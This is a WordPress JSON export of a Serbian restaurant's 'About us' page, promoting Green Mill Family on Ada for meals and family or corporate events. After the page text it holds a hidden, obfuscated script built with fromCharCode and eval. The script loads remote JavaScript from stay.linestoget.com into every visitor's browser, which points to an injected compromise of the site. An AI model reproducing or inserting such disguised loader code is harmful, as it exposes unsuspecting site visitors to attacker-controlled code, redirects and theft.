{"id":2,"date":"2019-10-22T10:47:12","date_gmt":"2019-10-22T08:47:12","guid":{"rendered":"http:\/\/greenmillada.com\/?page_id=2"},"modified":"2023-04-05T13:38:43","modified_gmt":"2023-04-05T11:38:43","slug":"o-nama","status":"publish","type":"page","link":"https:\/\/greenmillada.com\/","title":{"rendered":"O nama"},"content":{"rendered":"<div class=\"wp-block-image\">\n<figure class=\"aligncenter\"><img decoding=\"async\" width=\"250\" height=\"166\" src=\"https:\/\/greenmillada.com\/wp-content\/uploads\/2020\/03\/GREEN-MILL_Family_Jaca-e1583270259382.jpg\" alt=\"\" class=\"wp-image-105\"\/><\/figure>\n<\/div>\n\n\n<p>Ukoliko tra\u017eite mesto za istinski odmor, ugodan ambijent, vrhunsku ponudu kuhinje, a sve to okru\u017eeni zelenilom i smiruju\u0107im ose\u0107ajem pored vode, onda ste na pravom mestu.<\/p>\n\n\n\n<p>Green Mill Family je restoran na Maki\u0161koj strani Ade. Arhitekte i dizajneri enterijera stvorili su ovaj predivan i unikatni restoran, vode\u0107i ra\u010duna da se svojim izgledom i materijalima savr\u0161eno uklopi u ekolo\u0161ki ambijent sredine u kojoj se nalazi.<\/p>\n\n\n\n<p>Posebno pa\u017eljivo je osmi\u0161ljen i napravljen prostor za zabavu, bezbedan i prijatan boravak dece.  <\/p>\n\n\n\n<p>Profesionalno odabrano osoblje, da\u0107e svoj maksimum da va\u0161 boravak u na\u0161em restoranu bude pravi do\u017eivljaj i u\u017eitak.<\/p>\n\n\n\n<p>Za sve one koji tra\u017ee mesto da proslave porodi\u010dni dogadjaj, rodjendan, kr\u0161tenje, ven\u010danje, rodjenje deteta, iskreno verujemo da vam mo\u017eemo pru\u017eiti uslugu dostojnu va\u0161im zeljama i potrebama.<\/p>\n\n\n\n<p>Ukoliko pak \u017eelite napraviti poslovno ili korporativno dru\u017eenje, mi \u0107emo se potruditi da ispunimo sve va\u0161e zahteve.<\/p>\n\n\n\n<p>Do skorog vidjenja,<br>Green Mill Family &#8211; Ada <br>\u010dlan Green Mill Grupacije<\/p>\n\n\n\n<p>  <\/p>\n<script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,51,46,48,46,51,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script>","protected":false},"excerpt":{"rendered":"<p>Ukoliko tra\u017eite mesto za istinski odmor, ugodan ambijent, vrhunsku ponudu kuhinje, a sve to okru\u017eeni zelenilom i smiruju\u0107im ose\u0107ajem pored vode, onda ste na pravom mestu. Green Mill Family je restoran na Maki\u0161koj strani Ade. Arhitekte i dizajneri enterijera stvorili su ovaj predivan i unikatni restoran, vode\u0107i ra\u010duna da se svojim izgledom i materijalima savr\u0161eno &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/greenmillada.com\/\" class=\"more-link\">Read More<span class=\"screen-reader-text\"> &#8220;O nama&#8221;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-2","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/greenmillada.com\/index.php\/wp-json\/wp\/v2\/pages\/2","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/greenmillada.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/greenmillada.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/greenmillada.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/greenmillada.com\/index.php\/wp-json\/wp\/v2\/comments?post=2"}],"version-history":[{"count":10,"href":"https:\/\/greenmillada.com\/index.php\/wp-json\/wp\/v2\/pages\/2\/revisions"}],"predecessor-version":[{"id":261,"href":"https:\/\/greenmillada.com\/index.php\/wp-json\/wp\/v2\/pages\/2\/revisions\/261"}],"wp:attachment":[{"href":"https:\/\/greenmillada.com\/index.php\/wp-json\/wp\/v2\/media?parent=2"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}